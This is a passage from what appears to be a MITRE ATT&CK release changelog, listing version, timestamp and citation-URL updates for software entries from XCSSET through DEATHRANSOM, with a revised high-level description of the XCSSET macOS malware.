| description | [XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020) | [XCSSET](https://attack.mitre.org/software/S0658) is a modular macOS malware family delivered through infected Xcode projects and executed when the project is compiled. Active since August 2020, it has been observed installing backdoors, spoofed browsers, collecting data, and encrypting user files. It is composed of SHC-compiled shell scripts and run-only AppleScripts, often hiding in apps that mimic system tools (such as Xcode, Mail, or Notes) or use familiar icons (like Launchpad) to avoid detection.(Citation: trendmicro xcsset xcode project 2020)(Citation: April 2021 TrendMicro XCSSET)(Citation: Microsoft March 2025 XCSSET) |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Microsoft March 2025 XCSSET', 'description': 'Microsoft Threat Intelligence. (2025, March 11). New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects. Retrieved April 2, 2025.', 'url': 'https://www.microsoft.com/en-us/security/blog/2025/03/11/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects/'} |
| external_references | | {'source_name': 'April 2021 TrendMicro XCSSET', 'description': 'Steven Du, Dechao Zhao, Luis Magisa, Ariel Neimond Lazaro. (2021, April 16). XCSSET Quickly Adapts to macOS 11 and M1-based Macs. Retrieved February 18, 2025.', 'url': 'https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html'} |
[S1114] ZIPLINE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-01 19:26:04.144000+00:00 | 2025-04-15 19:46:35.730000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0160] certutil
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-27 15:28:27.482000+00:00 | 2024-11-27 21:56:15.800000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 1.5 |
[S0108] netsh
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-01-17 22:14:55.797000+00:00 | 2025-02-25 17:54:17.038000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[S0104] netstat
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-23 19:57:39.135000+00:00 | 2024-11-27 21:54:49.561000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[S0508] ngrok
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-25 18:54:49.773000+00:00 | 2024-11-27 21:35:52.624000+00:00 |
| external_references[3]['description'] | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf | https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
Patches
[S0066] 3PARA RAT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:34:04.031000+00:00 | 2025-04-16 20:38:18.768000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0065] 4H RAT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 14:46:14.131000+00:00 | 2025-04-16 20:38:22.132000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0677] AADInternals
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-16 20:38:50.579000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0469] ABK
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-24 15:34:14.618000+00:00 | 2025-04-16 20:38:27.718000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0045] ADVSTORESHELL
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 01:44:19.899000+00:00 | 2025-04-16 20:38:45.086000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1028] Action RAT
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-08-24 16:33:12.503000+00:00 | 2025-04-16 20:38:02.568000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0331] Agent Tesla
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-11 20:13:18.738000+00:00 | 2025-04-16 20:38:40.678000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0092] Agent.btz
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 14:50:51.213000+00:00 | 2025-04-16 20:38:03.857000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0584] AppleJeus
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-28 17:46:18.677000+00:00 | 2025-04-16 20:38:39.879000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0622] AppleSeed
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-15 20:08:18.786000+00:00 | 2025-04-16 20:37:59.641000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0099] Arp
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-25 19:24:08.305000+00:00 | 2025-04-16 20:38:50.933000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1029] AuTo Stealer
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-08-24 16:37:25.008000+00:00 | 2025-04-16 20:38:03.701000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0129] AutoIt backdoor
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 14:52:48.605000+00:00 | 2025-04-16 20:38:43.395000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0640] Avaddon
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 21:41:22.437000+00:00 | 2025-04-16 20:38:10.078000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1053] AvosLocker
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-02-15 17:03:59.324000+00:00 | 2025-04-16 20:37:54.114000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0344] Azorult
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-13 17:42:52.174000+00:00 | 2025-04-16 20:38:44.780000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0031] BACKSPACE
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 14:54:21.256000+00:00 | 2024-11-17 15:05:25.109000+00:00 |
| external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0245] BADCALL
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:32:03.328000+00:00 | 2025-04-16 20:38:26.720000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0642] BADFLICK
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 11:41:06.816000+00:00 | 2025-04-16 20:38:09.558000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0128] BADNEWS
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-06-21 12:32:12.581000+00:00 | 2025-04-16 20:38:41.446000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0470] BBK
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-24 15:36:00.792000+00:00 | 2025-04-16 20:38:42.578000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0127] BBSRAT
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 14:55:06.553000+00:00 | 2025-04-16 20:38:13.507000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0190] BITSAdmin
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-03 18:31:04.851000+00:00 | 2025-04-16 20:38:52.586000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0069] BLACKCOFFEE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-04 17:04:35.670000+00:00 | 2024-11-17 15:03:54.770000+00:00 |
| external_references[2]['description'] | FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016. | FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved November 17, 2024. |
[S0360] BONDUPDATER
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 14:06:12.720000+00:00 | 2025-04-16 20:38:37.261000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0114] BOOTRASH
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-06-09 18:58:41.760000+00:00 | 2024-11-17 16:24:43.289000+00:00 |
| external_references[3]['description'] | Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020. | Glyer, C.. (2017, June 22). Boot What?. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf | https://web.archive.org/web/20190926040727/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf |
| external_references[1]['description'] | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019. | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf | https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0014] BS2005
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-01 21:12:14.638000+00:00 | 2025-04-16 20:38:14.043000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0043] BUBBLEWRAP
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:03:26.307000+00:00 | 2025-04-16 20:37:56.566000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0638] Babuk
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-13 14:29:38.795000+00:00 | 2025-04-16 20:38:12.880000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0475] BackConfig
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 00:10:02.140000+00:00 | 2025-04-16 20:38:33.939000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0093] Backdoor.Oldrea
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 17:18:25.971000+00:00 | 2025-04-16 20:37:53.808000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0337] BadPatch
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-17 00:22:32.796000+00:00 | 2025-04-16 20:38:25.897000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0234] Bandook
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-11 19:42:14.066000+00:00 | 2025-04-16 20:38:20.706000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0239] Bankshot
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 20:41:17.223000+00:00 | 2025-04-16 20:37:57.714000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1068] BlackCat
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-06-15 18:33:45.154000+00:00 | 2025-04-16 20:38:07.230000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0564] BlackMould
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-03-23 22:18:00.145000+00:00 | 2025-04-16 20:38:13.187000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0486] Bonadan
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-08-10 19:17:14.766000+00:00 | 2025-04-16 20:38:06.109000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0635] BoomBox
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-01-18 18:10:37.673000+00:00 | 2025-04-16 20:38:34.236000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0651] BoxCaon
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 02:17:53.847000+00:00 | 2025-04-16 20:38:23.138000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0252] Brave Prince
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-11 21:44:52.220000+00:00 | 2025-04-16 20:37:59.301000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0204] Briba
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 14:56:14.671000+00:00 | 2024-11-17 19:55:07.590000+00:00 |
| external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0482] Bundlore
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-02-10 15:37:37.795000+00:00 | 2025-04-16 20:38:18.925000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0025] CALENDAR
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:12:21.836000+00:00 | 2025-04-16 20:38:10.875000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0465] CARROTBALL
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-10 14:44:23.055000+00:00 | 2025-04-16 20:38:52.338000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0222] CCBkdr
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-20 20:01:55.457000+00:00 | 2025-04-16 20:38:30.519000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0023] CHOPSTICK
Current version: 2.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 17:51:20.403000+00:00 | 2024-11-17 14:43:38.592000+00:00 |
| external_references[8]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
| external_references[8]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
| external_references[10]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
| external_references[10]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0212] CORALDECK
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:13:24.829000+00:00 | 2024-11-17 15:01:33.390000+00:00 |
| external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0137] CORESHELL
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 17:51:20.402000+00:00 | 2024-11-17 14:43:38.590000+00:00 |
| external_references[3]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0527] CSPY Downloader
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-18 23:14:56.867000+00:00 | 2025-04-16 20:38:52.033000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0119] Cachedump
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:15:36.756000+00:00 | 2025-04-16 20:38:56.154000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0454] Cadelspy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-29 13:13:22.064000+00:00 | 2025-04-16 20:38:29.046000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0274] Calisto
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-21 19:42:40.612000+00:00 | 2025-04-16 20:38:32.306000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0077] CallMe
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:16:18.880000+00:00 | 2025-04-16 20:38:35.526000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0351] Cannon
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:17:24.834000+00:00 | 2025-04-16 20:38:36.652000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0030] Carbanak
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-17 19:51:14.195000+00:00 | 2025-04-16 20:38:16.838000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0335] Carbon
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-25 15:46:06.354000+00:00 | 2025-04-16 20:38:31.987000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0261] Catchamas
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 14:51:14.620000+00:00 | 2024-11-17 18:36:16.203000+00:00 |
| external_references[2]['description'] | Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018. | Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99 | https://web.archive.org/web/20190508165711/https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0572] Caterpillar WebShell
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-27 01:47:15.413000+00:00 | 2025-04-16 20:38:17.640000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0144] ChChes
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:32:28.615000+00:00 | 2024-11-17 16:46:57.582000+00:00 |
| external_references[7]['description'] | Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017. | Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved November 17, 2024. |
| external_references[7]['url'] | http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html | https://blogs.jpcert.or.jp/en/2017/02/chches-malware--93d6.html |
[S0631] Chaes
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-24 21:17:54.342000+00:00 | 2025-04-16 20:38:18.426000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0220] Chaos
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-01 18:30:55.286000+00:00 | 2025-04-16 20:38:11.037000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0674] CharmPower
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-01-25 15:43:34.231000+00:00 | 2025-04-16 20:38:18.570000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0107] Cherry Picker
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:20:05.298000+00:00 | 2025-04-16 20:38:30.864000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0660] Clambling
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-23 15:26:58.356000+00:00 | 2025-04-16 20:38:16.175000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0611] Clop
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 00:18:17.636000+00:00 | 2025-04-16 20:38:35.205000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0054] CloudDuke
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:21:58.231000+00:00 | 2025-04-16 20:38:35.863000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0338] Cobian RAT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:22:42.218000+00:00 | 2025-04-16 20:38:29.365000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0369] CoinTicker
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:23:53.711000+00:00 | 2025-04-16 20:38:36.473000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0126] ComRAT
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 03:30:00.985000+00:00 | 2025-04-16 20:38:37.924000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0244] Comnie
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:25:11.871000+00:00 | 2025-04-16 20:38:43.241000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0608] Conficker
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:15:47.458000+00:00 | 2025-04-16 20:38:10.239000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0591] ConnectWise
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-13 13:09:38.786000+00:00 | 2025-04-16 20:38:53.716000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0575] Conti
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-09 18:13:14.416000+00:00 | 2025-04-16 20:38:06.412000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0492] CookieMiner
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 03:33:29.192000+00:00 | 2025-04-16 20:38:42.106000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0050] CosmicDuke
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-28 21:32:37.171000+00:00 | 2025-04-16 20:38:00.812000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0614] CostaBricks
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-05 16:34:18.865000+00:00 | 2025-04-16 20:38:11.736000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1023] CreepyDrive
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-16 20:38:17.473000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1024] CreepySnail
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-08-08 20:18:47.253000+00:00 | 2025-04-16 20:38:36.803000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0115] Crimson
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 18:39:01.095000+00:00 | 2025-04-16 20:38:01.622000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0538] Crutch
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-22 21:35:01.766000+00:00 | 2025-04-16 20:38:23.296000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0498] Cryptoistic
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-08-18 15:36:30.748000+00:00 | 2025-04-16 20:38:27.529000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0625] Cuba
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-12 21:13:50.228000+00:00 | 2025-04-16 20:38:15.861000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0616] DEATHRANSOM
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
